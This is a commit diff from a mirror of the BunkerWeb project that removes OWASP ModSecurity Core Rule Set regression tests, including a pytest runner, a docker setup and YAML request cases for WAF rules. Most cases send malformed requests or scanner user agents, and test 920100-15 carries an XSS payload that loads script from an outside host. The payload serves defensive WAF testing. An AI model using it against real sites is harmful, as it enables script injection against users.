Elgato_dark/bunkerweb
1
0
Fork 0
mirror of https://github.com/bunkerity/bunkerweb synced 2026-05-24 09:28:37 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

chore: Remove unnecessary tests files in ModSecurity core rule set

Browse source
This commit is contained in:
Théophile Diot 2024-05-07 16:55:32 +02:00
parent 86ee2a9745
commit 437bd24993
No known key found for this signature in database
GPG key ID: 248FEA4BAE400D06
498 changed files with 2 additions and 118052 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

72
src/common/core/modsecurity/files/coreruleset-v3/tests/docker-compose.yml vendored
View file

@ -1,72 +0,0 @@
version: '3.2'
# Only one of these will be up at a time for now.
# Concurrency will be on the tests folder we have.
services:
modsec2-apache:
container_name: modsec2-apache
image: owasp/modsecurity-crs:apache
environment:
SERVERNAME: modsec2-apache
BACKEND: http://backend
PORT: "80"
MODSEC_RULE_ENGINE: DetectionOnly
PARANOIA: 4
TZ: "${TZ}"
ERRORLOG: "/var/log/error.log"
ACCESSLOG: "/var/log/access.log"
MODSEC_AUDIT_LOG_FORMAT: Native
MODSEC_AUDIT_LOG_TYPE: Serial
MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
MODSEC_TMP_DIR: "/tmp"
MODSEC_RESP_BODY_ACCESS: "On"
MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
COMBINED_FILE_SIZES: "65535"
CRS_ENABLE_TEST_MARKER: 1
volumes:
- ./logs/modsec2-apache:/var/log:rw
- ../rules:/opt/owasp-crs/rules:ro
- ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example
entrypoint: ["/bin/sh", "-c", "/bin/cp /etc/modsecurity.d/owasp-crs/crs-setup.conf.example /etc/modsecurity.d/owasp-crs/crs-setup.conf && /docker-entrypoint.sh && apachectl -D FOREGROUND"]
ports:
- "80:80"
depends_on:
- backend
modsec3-nginx:
container_name: modsec3-nginx
image: owasp/modsecurity-crs:nginx
environment:
SERVERNAME: modsec3-nginx
BACKEND: http://backend
PORT: "80"
MODSEC_RULE_ENGINE: DetectionOnly
PARANOIA: 4
TZ: "${TZ}"
ERRORLOG: "/var/log/error.log"
LOGLEVEL: "info"
ACCESSLOG: "/var/log/access.log"
MODSEC_AUDIT_LOG_FORMAT: Native
MODSEC_AUDIT_LOG_TYPE: Serial
MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
MODSEC_RESP_BODY_ACCESS: "On"
MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
COMBINED_FILE_SIZES: "65535"
CRS_ENABLE_TEST_MARKER: 1
volumes:
- ./logs/modsec3-nginx:/var/log:rw
- ../rules:/opt/owasp-crs/rules:ro
- ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example
command: ["nginx", "-g", "daemon off;"]
ports:
- "80:80"
depends_on:
- backend
# our test originally targeted www.example.com as backend
# and that would do real traffic, to a real site
#
backend:
image: docker.io/kennethreitz/httpbin

1
src/common/core/modsecurity/files/coreruleset-v3/tests/integration/requirements.txt vendored
View file

@ -1 +0,0 @@
pytest>=2.9.1

149
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/CRS_Tests.py vendored
View file

@ -1,149 +0,0 @@
from subprocess import TimeoutExpired
from ftw import logchecker, testrunner, http
from ftw.ruleset import Input
import pytest
import os
CRS_HEADER = 'X-CRS-Test'
def test_crs(test, logchecker_obj):
runner = testrunner.TestRunner()
for stage in test.stages:
runner.run_stage(stage, logchecker_obj)
class FooLogChecker(logchecker.LogChecker):
def __init__(self, config):
super(FooLogChecker, self).__init__()
self.log_location = self.find_log_location(config)
self.backwards_reader = BackwardsReader(self.log_location)
self.start_marker = None
self.end_marker = None
def mark_start(self, stage_id):
self.start_marker = self.find_marker(stage_id)
def mark_end(self, stage_id):
self.end_marker = self.find_marker(stage_id)
def find_marker(self, stage_id):
stage_id_bytes = stage_id.encode('utf-8')
header_bytes = CRS_HEADER.encode('utf-8')
def try_once():
self.mark_and_flush_log(stage_id)
self.backwards_reader.reset()
return self.backwards_reader.readline() or b''
line = try_once()
while not (header_bytes in line and stage_id_bytes in line):
line = try_once()
return line
def get_logs(self):
logs = []
# At this point we're already at the end marker
for line in self.backwards_reader.readlines():
if line == self.start_marker:
break
logs.append(line.decode('utf-8'))
return logs
def mark_and_flush_log(self, header_value):
"""
Send a valid request to the server with a special header that will
generate an entry in the log. We can use this to flush the log and to
mark the output so we know where our test output is.
"""
http.HttpUA().send_request(Input(
headers={
'Host': 'localhost',
'User-Agent': 'CRS',
'Accept': '*/*',
CRS_HEADER: header_value
},
version='HTTP/1.0'))
@staticmethod
def find_log_location(config):
key = 'log_location_linux'
# First, try to find the log configuration from config.ini
if key in config:
return config[key]
else:
# Now we could check for the configuration that was passed
# on the command line. Unfortunately, we use a default, so we
# don't know whether it was *actually* on the command line.
# Let's try to find the Docker container instead.
import os.path
import subprocess
prefix = os.path.join('tests', 'logs')
log_file_name = 'error.log'
directory_name = 'modsec2-apache'
process = subprocess.Popen(
'docker ps --format "{{.Names}}"',
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
out, _ = process.communicate(timeout=10)
except TimeoutExpired:
out = ''
if b'modsec3-nginx' in out:
directory_name = 'modsec3-nginx'
return os.path.join(prefix, directory_name, log_file_name)
@pytest.fixture(scope='session')
def logchecker_obj(config):
return FooLogChecker(config)
# Adapted from http://code.activestate.com/recipes/120686-read-a-text-file-backwards/
class BackwardsReader:
def __init__(self, file, blksize=4096):
"""initialize the internal structures"""
self.file = file
# how big of a block to read from the file...
self.blksize = blksize
self.f = open(file, 'rb')
self.reset()
def readline(self):
while len(self.data) == 1 and ((self.blkcount * self.blksize) < self.size):
self.blkcount = self.blkcount + 1
line = self.data[0]
try:
self.f.seek(-self.blksize * self.blkcount, os.SEEK_END) # read from end of file
self.data = (self.f.read(self.blksize) + line).split(b'\n')
except IOError: # can't seek before the beginning of the file
self.f.seek(0)
self.data = (self.f.read(self.size - (self.blksize * (self.blkcount-1))) + line).split(b'\n')
if len(self.data) == 0:
return ""
line = self.data.pop()
return line + b'\n'
def readlines(self):
line = self.readline()
while line:
yield line
line = self.readline()
def reset(self):
# get the file size
self.size = os.stat(self.file)[6]
# how many blocks we've read
self.blkcount = 1
# if the file is smaller than the blocksize, read a block,
# otherwise, read the whole thing...
if self.size > self.blksize:
self.f.seek(-self.blksize * self.blkcount, 2) # read from end of file
self.data = self.f.read(self.blksize).split(b'\n')
# strip the last item if it's empty... a byproduct of the last line having
# a newline at the end of it
if not self.data[-1]:
self.data.pop()

63
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/README.md vendored
View file

@ -1,63 +0,0 @@
owasp-crs-regressions
=====================
Introduction
============
Welcome to the OWASP Core Rule Set regression testing suite. This suite is meant to test specific rules in OWASP CRS version 3. The suite is designed to uses preconfigured IDs that are specific to this version of CRS. The tests themselves can be run without CRS and one would expect the same elements to be blocked, however one must override the default Output parameter in the tests.
Installation
============
The OWASP Core Rule Set project was part of the effort to develop FTW, the Framework for Testing WAFs. As a result, we use this project in order to run our regression testing. FTW is designed to use existing Python testing frameworks to allow for easy to read web based testing, provided in YAML. You can install FTW by from the repository (at https://github.com/CRS-support/ftw) or by running pip.
```pip install -r requirements.txt```
This will install FTW as a library. It can also be run natively, see the FTW documentation for more detail.
Requirements
============
There are Three requirements for running the OWASP CRS regressions.
1. You must have ModSecurity specify the location of your error.log, this is done in the config.py file
2. ModSecurity must be in DetectionOnly (or anomaly scoring) mode
3. You must disable IP blocking based on previous events
Note: The test suite compares timezones -- if your test machine and your host machine are in different timezones this can cause bad results
To accomplish 2. and 3. you may use the following rule in your setup.conf:
```
SecAction "id:900005,\
phase:1,\
nolog,\
pass,\
ctl:ruleEngine=DetectionOnly,\
ctl:ruleRemoveById=910000,\
setvar:tx.paranoia_level=4,\
setvar:tx.crs_validate_utf8_encoding=1,\
setvar:tx.arg_name_length=100,\
setvar:tx.arg_length=400"
```
Once these requirements have been met the tests can be run by using pytest.
Running The Tests
=================
On Windows this will look like:
-------------------------------
Single Rule File:
```py.test.exe -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test.exe -v CRS_Tests.py --ruledir_recurse=tests/```
On Linux this will look like:
-----------------------------
Single Rule File:
```py.test -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test -v CRS_Tests.py --ruledir_recurse=tests/```
Contributions
=============
We'd like to thank Fastly for their help and support in developing these tests.

0
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/__init__.py vendored
View file

5
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/config.ini vendored
View file

@ -1,5 +0,0 @@
[modsec2-apache]
log_location_linux = tests/logs/modsec2-apache/error.log
[modsec3-nginx]
log_location_linux = tests/logs/modsec3-nginx/error.log

17
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/conftest.py vendored
View file

@ -1,17 +0,0 @@
try:
import ConfigParser as configparser
except ImportError:
import configparser
import os
import pytest
def pytest_addoption(parser):
parser.addoption('--config', action='store', default='modsec2-apache')
@pytest.fixture(scope='session')
def config(request):
cp = configparser.RawConfigParser()
cp.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
return dict(cp.items(request.config.getoption('--config')))

1
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/requirements.txt vendored
View file

@ -1 +0,0 @@
ftw==1.3.0

131
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml vendored
View file

@ -1,131 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "911100.yaml"
description: "Description"
tests:
- test_title: 911100-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "TEST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"911100\""
- test_title: 911100-6
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: DELETE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
- test_title: 911100-7
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: FOO
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
- test_title: 911100-8
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: SUBSCRIBE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"

84
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml vendored
View file

@ -1,84 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913100.yaml
tests:
- test_title: 913100-1
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-2
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Arachni/0.2.1
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-3
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: w3af.sourceforge.net
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-4
desc: "Scanner identification based on User-agent field"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "nessus"
uri: "/"
output:
log_contains: id "913100"

43
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913110.yaml vendored
View file

@ -1,43 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913110.yaml
tests:
- test_title: 913110-1
desc: Request Indicates a Security Scanner Scanned the Site (913110) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913110"
- test_title: 913110-2
desc: "Scanner identification based on custom header"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
X-Scanner: "whatever"
uri: "/"
output:
log_contains: id "913110"

55
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913120.yaml vendored
View file

@ -1,55 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913120.yaml
tests:
- test_title: 913120-1
desc: Request Indicates a Security Scanner Scanned the Site (913120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
method: GET
port: 80
uri: /nessustest
version: HTTP/1.0
output:
log_contains: id "913120"
- test_title: 913120-2
desc: IBM fingerprint from (http://www-01.ibm.com/support/docview.wss?uid=swg21293132)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
uri: /AppScan_fingerprint/MAC_ADDRESS_01234567890.html?9ABCDG1
version: HTTP/1.0
output:
log_contains: id "913120"
- test_title: 913120-3
desc: "Scanner identification based on uri"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
version: HTTP/1.0
uri: "/nessus_is_probing_you_"
output:
log_contains: id "913120"

256
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml vendored
View file

@ -1,256 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920100.yaml"
description: "Tests to trigger, or not trigger 920100"
tests:
- # Standard GET request
test_title: 920100-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # Request has tab (\t) before request method - Apache complains
# AH00126: Invalid URI in request GET / HTTP/1.1
test_title: 920100-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: " GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
status: [400]
- # Perfectly valid OPTIONS request
test_title: 920100-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "*"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # Valid CONNECT request however this is disabled by Apache default
test_title: 920100-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "1.2.3.4:80"
version: "HTTP/1.1"
output:
status: [405, 403]
- # invalid Connect request, domains require ports
test_title: 920100-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com"
version: "HTTP/1.1"
output:
status: [400]
- # This is an acceptable CONNECT request for SSL tunneling
test_title: 920100-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com:80"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
- # Valid request with query and anchor components
test_title: 920100-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # The colon in the path is not allowed. Apache will block by default
# (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file
test_title: 920100-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html:80?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
status: [400, 403]
- # Normal Options request with path
test_title: 920100-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # An invalid method with a long name
test_title: 920100-10
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "REALLYLONGUNREALMETHOD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
- # An invalid request because a backslash is used in uri
# Apache will end up blocking this before it gets to CRS.
# We will need to support OR output tests to fix this
test_title: 920100-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "\\"
version: "HTTP/1.1"
output:
status: [403, 400]
- test_title: 920100-12
desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: "\tGET"
port: 80
uri: /
version: HTTP/1.1
output:
status: [400]
- test_title: 920100-13
desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: \index.html
version: HTTP\1.0
output:
status: [403, 400]
# log_contains: id "920100"
- test_title: 920100-14
desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: '|GET'
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920100"
- test_title: 920100-15
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
status: [403, 400]
# log_contains: id "920100"

105
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml vendored
View file

@ -1,105 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920120.yaml"
description: "Tests to trigger rule 920120"
tests:
- test_title: 920120-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "*/*"
Accept-Language: "en"
Connection: "close"
Referer: "http://localhost/"
Content-Type: "multipart/form-data; boundary=--------397236876"
data: |
----------397236876
Content-Disposition: form-data; name="fileRap"; filename="file=.txt"
Content-Type: text/plain
555-555-0199@example.com
----------397236876--
protocol: "http"
output:
log_contains: "id \"920120\""
- test_title: 920120-2
desc: Attempted multipart/form-data bypass (920120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv
method: POST
port: 80
uri: /cgi-bin/fup.cgi
version: HTTP/1.1
data: |
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="fi=le"; filename="test"
Content-Type: text/plain
email: security@modsecurity.org
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="note"
Contact info.
-----------------------------627652292512397580456702590--
output:
log_contains: id "920120"
- test_title: 920120-3
desc: Invalid Request Body (920120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data: |
-----------------------------265001916915724
Content-Disposition: form-data; name="fi;le"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
t2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
output:
log_contains: id "920120"

106
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml vendored
View file

@ -1,106 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920160.yaml"
description: "Tests to trigger rule 920160"
tests:
- # Non digit Content-Length without content-type
test_title: 920160-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: [400]
- # Non digit content-length with content-type
test_title: 920160-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: [400]
- # Mixed digit and non digit content length
test_title: 920160-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "123x"
protocol: "http"
uri: "/"
output:
status: [400]
- # Apache auto corrects for this error now so the log should not contain anything
test_title: 920160-4
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: '3'
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /post
version: HTTP/1.0
data: abc
output:
status: [200]
no_log_contains: id "920160"
- test_title: 920160-5
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: "3;"
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: [200, 403, 400]
# log_contains: id "920160"

115
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml vendored
View file

@ -1,115 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920170.yaml"
description: "A Selection of tests to trigger rule 920170"
tests:
- # POST Request with data (valid)
test_title: 920170-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
no_log_contains: "id \"920170\""
- # GET request with data
test_title: 920170-2
stages:
- stage:
input:
